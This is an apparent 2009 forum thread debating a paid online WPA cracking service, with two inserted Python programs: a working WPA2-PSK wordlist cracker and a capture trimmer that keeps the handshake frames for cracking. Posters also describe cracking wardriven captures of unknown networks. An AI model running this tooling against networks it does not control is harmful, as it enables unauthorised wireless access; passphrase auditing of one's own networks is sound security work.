Remote Exploit Forums
General IT Discussion (Non BT Related Topics)
#1
04-16-2009, 06:50 PM
pureh@te

online wpa cracker

OK, I'm not going to start a poll because polls suck, but I was just wondering from the community if an online WPA cracker would be something that people would use.

Here is how it would work.
1. Visit web app
2. Enter ESSID, email and upload cap file
3. Pay 5 or 10 dollars with PayPal (this is simply to cover hosting and hardware; seems reasonable to me. I would do donations but we all know no one donates much.)
4. 30 mins later you receive an email with the results.

Results of what, you may ask. Well, this is simply a proof of concept tool. It would mainly be useful to audit your own passphrase or audit a WPA network with ease while on a pentest. The point being, if you were on an audit you could simply upload a cap file and have it run against a password list and retrieve the results fairly quickly. Something that would take you 1 week at your office could be quickly done with a web app.

My idea is to use a list of 150 million passwords, primarily English, which takes approximately 25 mins to complete. Now the recovery rate of passwords may not be that high, and you would have to accept the terms of service, which say there is no guarantee.

My theory is, if your passphrase can make it through 150 million passphrases then you can consider it secure. I would appreciate some comments on this idea either way. Don't be afraid to tell me your real opinion and hurt my feelings if need be.
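What "run the cap file against a password list" actually costs, as an added example that is not code from the original thread: the service would do exactly this per candidate, PBKDF2 at 4096 iterations salted with the ESSID, then a PTK expansion and one HMAC to check the handshake MIC. The handshake here is constructed in-script with known MACs, nonces and passphrase rather than taken from a capture, and the candidate list is a toy stand-in for the 150 million word list; the derivation itself follows IEEE 802.11i.

```python
"""WPA2-PSK passphrase audit: recover a passphrase from a 4-way handshake by
running a wordlist. Added example; the handshake is constructed in-script."""
import hashlib
import hmac
import struct

# ---- Key derivation as specified in IEEE 802.11i -------------------------

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The 4096 iterations, salted with the ESSID, are what make every wordlist
    candidate cost real CPU time (and why precomputed tables are per-ESSID)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_80211i(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces)).
    Its first 16 bytes are the KCK, the key that authenticates EAPOL-Key MICs."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_80211i(pmk, b"Pairwise key expansion", data, 48)[:16]


# EAPOL-Key layout: 802.1X hdr(4) desc type(1) key info(2) key len(2) replay(8)
# nonce(32) IV(16) RSC(8) ID(8) MIC(16) key data len(2) key data(...)
KEYINFO_OFFSET, MIC_OFFSET = 5, 81


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed. The key
    descriptor version (low 3 bits of key info) selects the algorithm:
    1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1 truncated to 128 bits (WPA2/CCMP)."""
    version = struct.unpack_from(">H", eapol, KEYINFO_OFFSET)[0] & 0x7
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, eapol, wordlist):
    """Return the first candidate whose derived KCK reproduces the frame's MIC, else None."""
    target = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:      # 802.11i passphrase length rule: skip impossible words
            continue
        kck = kck_from_pmk(pmk_from_passphrase(cand, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol), target):
            return cand
    return None


# ---- Constructed handshake (values chosen for the example, not captured) --

SSID = "homenet"
AP_MAC = bytes.fromhex("00115504d9e1")
STA_MAC = bytes.fromhex("001cbf37b2a0")
ANONCE = bytes(range(32))            # toy nonces; real ones are random
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "12345678", "letmein1", "correct horse battery", "homenet2009"]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Message 2 of the handshake (STA -> AP): RSN descriptor, key info 0x010a
    (pairwise | MIC | descriptor version 2). A real message 2 carries the RSN IE
    as key data; this constructed frame leaves key data empty."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10"          # desc type, key info, key length 16 (CCMP)
            + b"\x00" * 7 + b"\x01"                      # replay counter 1
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + mic + b"\x00\x00")                         # MIC, key data length 0
    return b"\x02\x03" + struct.pack(">H", len(body)) + body


def make_handshake(passphrase: str) -> bytes:
    """Play the supplicant: sign message 2 with the KCK derived from `passphrase`."""
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return build_eapol_msg2(SNONCE, eapol_mic(kck, build_eapol_msg2(SNONCE)))


if __name__ == "__main__":
    frame = make_handshake("correct horse battery")
    print("recovered:", crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, frame, WORDLIST))
    missing = make_handshake("zebra-giraffe-42")
    print("not in list:", crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, missing, WORDLIST))
```

Two things worth noticing: nothing in the capture is "decrypted", the attacker only re-derives the MIC and compares, so a capture with message 2 (or 3) plus the ANonce from message 1 is all that is needed; and the PBKDF2 step dominates, which is why a hosted service is basically selling CPU time and why a passphrase outside any wordlist survives no matter how much of it is bought.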
#2
04-16-2009, 07:02 PM
cybrsnpr

Although your idea has merit, I have always been opposed to releasing client data (especially passwords, hashes etc.) outside the control of my company and pentest team.

Just my 2 cents, but I wouldn't trust anyone outside of my NDA scope with that kind of data. So, although I would like to use an online cracker like you propose, from a business sense, I couldn't do it.

But, I'm just 1 scenario. I'm sure there are others out there that would find this capability very useful.

Good Luck...
#3
04-16-2009, 07:10 PM
pureh@te

Quote:
Originally Posted by cybrsnpr
Although your idea has merit, I have always been opposed to releasing client data (especially passwords, hashes etc.) outside the control of my company and pentest team.

Just my 2 cents, but I wouldn't trust anyone outside of my NDA scope with that kind of data. So, although I would like to use an online cracker like you propose, from a business sense, I couldn't do it.

But, I'm just 1 scenario. I'm sure there are others out there that would find this capability very useful.

Good Luck...
True. Did not think of that. Thanks for the reply.
#4
04-16-2009, 09:28 PM
kidFromBigD

@pureh@te

The idea is a good one. In fact, I'll submit the finished website to Digg.com and you'll be raking in the cash. Can you say 'Stimulus Package'?

All joking aside, perhaps consult with an attorney who can help you word the language each submitter must agree to. This is, after all, a method the skiddies could use to get into the neighbor's WiFi, and money is involved.

Also, my experience cracking my own WPA2 network is that the .cap file can get large, especially when airodump-ng finds other access points broadcasting on the same channel and the first de-auth did not work. Be ready for potentially huge uploads. Or, equip folks with the tools to pare down the file to just the important parts (beacon frame, 4-way). Personally I know how to do this, but others maybe not so much.

Other than that, I suggest a closed trial for trusted members to see how things go in the early stages.

Keep us up-to-date on your thoughts.
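The paring-down kidFromBigD describes, as an added example that is not a tool from the original thread: keep one beacon naming the target ESSID (which also pins the BSSID) and the EAPOL-Key frames belonging to that BSSID, and drop everything else. It assumes the little-endian, microsecond pcap format airodump-ng writes, with link type 105 (raw 802.11) or 127 (radiotap, which it strips); the sample capture, MAC addresses and frame contents are constructed in-script.

```python
"""Trim a WPA capture to beacon + EAPOL frames. Added example, not from the thread."""
import struct

PCAP_MAGIC = 0xA1B2C3D4
LINKTYPE_IEEE802_11, LINKTYPE_RADIOTAP = 105, 127
LLC_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"     # LLC/SNAP header, ethertype 0x888E


def read_pcap(data: bytes):
    """Return (linktype, [(ts_sec, ts_usec, frame), ...]) from a pcap file image."""
    magic, _, _, _, _, _, linktype = struct.unpack_from("<IHHiIII", data, 0)
    if magic != PCAP_MAGIC:
        raise ValueError("unsupported pcap magic %#x (expected little-endian usec pcap)" % magic)
    pos, records = 24, []
    while pos + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _ = struct.unpack_from("<IIII", data, pos)
        pos += 16
        records.append((ts_sec, ts_usec, data[pos:pos + incl_len]))
        pos += incl_len
    return linktype, records


def write_pcap(linktype: int, records) -> bytes:
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, linktype)
    for ts_sec, ts_usec, frame in records:
        out += struct.pack("<IIII", ts_sec, ts_usec, len(frame), len(frame)) + frame
    return out


def classify(frame: bytes):
    """("beacon", bssid, essid), ("eapol", bssid, None) or None for anything else."""
    if len(frame) < 24:
        return None
    fc, flags = frame[0], frame[1]
    ftype, subtype = (fc >> 2) & 0x3, fc >> 4
    if ftype == 0 and subtype == 8:                        # management frame, beacon
        bssid, pos = frame[16:22], 24 + 12                 # skip timestamp, interval, capability
        while pos + 2 <= len(frame):                       # walk the tagged parameters
            eid, elen = frame[pos], frame[pos + 1]
            if eid == 0:                                   # element 0 is the SSID
                return "beacon", bssid, frame[pos + 2:pos + 2 + elen].decode("utf-8", "replace")
            pos += 2 + elen
        return "beacon", bssid, ""
    if ftype == 2:                                         # data frame
        hlen = 24 + (6 if flags & 0x3 == 0x3 else 0) + (2 if subtype & 0x8 else 0)  # addr4, QoS
        if frame[hlen:hlen + 8] == LLC_EAPOL:
            # BSSID sits in addr1 (To-DS), addr2 (From-DS) or addr3 (neither)
            bssid = frame[4:10] if flags & 1 else frame[10:16] if flags & 2 else frame[16:22]
            return "eapol", bssid, None
    return None


def trim_capture(pcap: bytes, essid: str):
    """Return (trimmed_pcap, frames_in, frames_out). Pass 1 learns the target BSSID
    from its beacon, pass 2 keeps that beacon (once) and that BSSID's EAPOL frames."""
    linktype, records = read_pcap(pcap)
    frames = []
    for ts_sec, ts_usec, frame in records:
        if linktype == LINKTYPE_RADIOTAP:                  # radiotap length is a LE u16 at offset 2
            frame = frame[struct.unpack_from("<H", frame, 2)[0]:]
        frames.append((ts_sec, ts_usec, frame, classify(frame)))
    bssid = next((i[1] for *_, i in frames if i and i[0] == "beacon" and i[2] == essid), None)
    if bssid is None:
        raise ValueError("no beacon for ESSID %r in capture" % essid)
    kept, have_beacon = [], False
    for ts_sec, ts_usec, frame, info in frames:
        if not info or info[1] != bssid or (info[0] == "beacon" and have_beacon):
            continue
        have_beacon = have_beacon or info[0] == "beacon"
        kept.append((ts_sec, ts_usec, frame))
    return write_pcap(LINKTYPE_IEEE802_11, kept), len(records), len(kept)


# ---- Constructed sample capture (addresses and payloads invented for the example) ----

AP, STA, NEIGHBOUR = bytes.fromhex("00115504d9e1"), bytes.fromhex("001cbf37b2a0"), bytes.fromhex("0016b6aa1f00")
LLC_IP = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"


def beacon(bssid: bytes, essid: str) -> bytes:
    hdr = b"\x80\x00\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    fixed = b"\x00" * 8 + b"\x64\x00" + b"\x11\x04"       # timestamp, interval 100 TU, capability
    return hdr + fixed + b"\x00" + bytes([len(essid)]) + essid.encode()


def data(src: bytes, dst: bytes, bssid: bytes, payload: bytes, to_ds: bool, qos: bool = False) -> bytes:
    fc = 0x88 if qos else 0x08                             # type data; subtype QoS-data or data
    addrs = bssid + src + dst if to_ds else dst + bssid + src
    return (bytes([fc, 1 if to_ds else 2]) + b"\x00\x00" + addrs + b"\x00\x00"
            + (b"\x00\x00" if qos else b"") + payload)


def sample_capture(linktype: int = LINKTYPE_IEEE802_11) -> bytes:
    eapol = LLC_EAPOL + b"\x02\x03\x00\x5f" + b"\x00" * 95      # EAPOL-Key frame, 95-byte body
    frames = [beacon(AP, "homenet"), beacon(NEIGHBOUR, "neighbour")]
    frames += [data(STA, AP, AP, LLC_IP + b"\x45" + b"\x00" * 1199, to_ds=True) for _ in range(20)]
    frames += [data(AP, STA, AP, eapol, to_ds=False, qos=True), data(STA, AP, AP, eapol, to_ds=True, qos=True),
               data(AP, STA, AP, eapol, to_ds=False, qos=True), data(STA, AP, AP, eapol, to_ds=True, qos=True)]
    frames.append(data(NEIGHBOUR, STA, NEIGHBOUR, eapol, to_ds=False))   # someone else's handshake
    radiotap = b"\x00\x00\x08\x00\x00\x00\x00\x00" if linktype == LINKTYPE_RADIOTAP else b""
    return write_pcap(linktype, [(1239910000, i, radiotap + f) for i, f in enumerate(frames)])


if __name__ == "__main__":
    out, n_in, n_out = trim_capture(sample_capture(), "homenet")
    print("kept %d of %d frames, %d -> %d bytes" % (n_out, n_in, len(sample_capture()), len(out)))
```

The two-pass structure matters because in a real capture the handshake can precede the first beacon you logged; filtering on BSSID rather than ESSID also keeps a neighbour's EAPOL frames out, which would otherwise waste the cracker's time on a network the submitter has no business testing.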
#5
04-16-2009, 09:35 PM
Barry

Quote:
Originally Posted by kidFromBigD
@pureh@te

The idea is a good one. In fact, I'll submit the finished website to Digg.com and you'll be raking in the cash. Can you say 'Stimulus Package'?

All joking aside, perhaps consult with an attorney who can help you word the language each submitter must agree to. This is, after all, a method the skiddies could use to get into the neighbor's WiFi, and money is involved.

Also, my experience cracking my own WPA2 network is that the .cap file can get large, especially when airodump-ng finds other access points broadcasting on the same channel and the first de-auth did not work. Be ready for potentially huge uploads. Or, equip folks with the tools to pare down the file to just the important parts (beacon frame, 4-way). Personally I know how to do this, but others maybe not so much.

Other than that, I suggest a closed trial for trusted members to see how things go in the early stages.

Keep us up-to-date on your thoughts.
And that's why it's a bad idea....
#6
04-16-2009, 10:22 PM
Lincoln

Quote:
Originally Posted by pureh@te
It would mainly be useful to audit your own passphrase or audit a WPA network with ease while on a pentest.
I think it's an awesome idea, except I think it would be abused and people would be cracking their neighbors' internet for 10 bucks.
#7
04-16-2009, 10:37 PM
Member

Quote:
Originally Posted by Lincoln
I think it's an awesome idea, except I think it would be abused and people would be cracking their neighbors' internet for 10 bucks.
I think that's why he wants the pay service, to cut down on the morons that would abuse it. All the kids in my neighborhood wouldn't pay to do that. But I can't speak for them or any of the others out there. I may be completely wrong and they would pay for it. But they'd still have to get the cap file and know a little something in order to submit it.
#8
04-16-2009, 11:11 PM
pureh@te

Thanks guys for the feedback. Please keep it coming. I have thought of most of this stuff. I'm aware it may be misused, however I have done a little research. Over the past month or so I have had trusted friends send me .cap files from wardrives, of which I know nothing at all of the location, and I have run each of them against the word list. Out of about 80 or so cap files I have recovered only about 15. So the success rate is not all that high, which is good because it shows that at least the people that are using WPA are using good passphrases.

On the note of the cap file size, I would put a 10 MB limit on the cap files, and if you don't know how to trim it down then you are SOL.

Like I said, I don't want this on Digg, or Slashdot or any of that crap. In fact, if that happened I would be forced to remove it, I'm pretty sure. I'm not trying to make any money either, I have a job.

I simply thought that since there is nothing else out there like this that it would be cool. I mean there are plenty of regular online pass crackers so why would a WPA one be any different.

Thanks for the opinions, I look forward to more.
#9
04-17-2009, 10:33 AM
Senior Member

pure_hate, your idea is neat. I'll tell you why.

Say a pentester has a need to very quickly bypass a wireless network, and he has not brought with him the resources necessary to break the WPA of their client. Paying $10 for a quick "fix" would be the thing to save the day, right?

You just start the service... and make sure you have a datacenter to handle the traffic and cpu cycles
#10
04-17-2009, 12:43 PM
Senior Member

Or you could just rent a VPS with lots of space and share it amongst friends.

tbh there are too many idiots around who will abuse the service.
Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.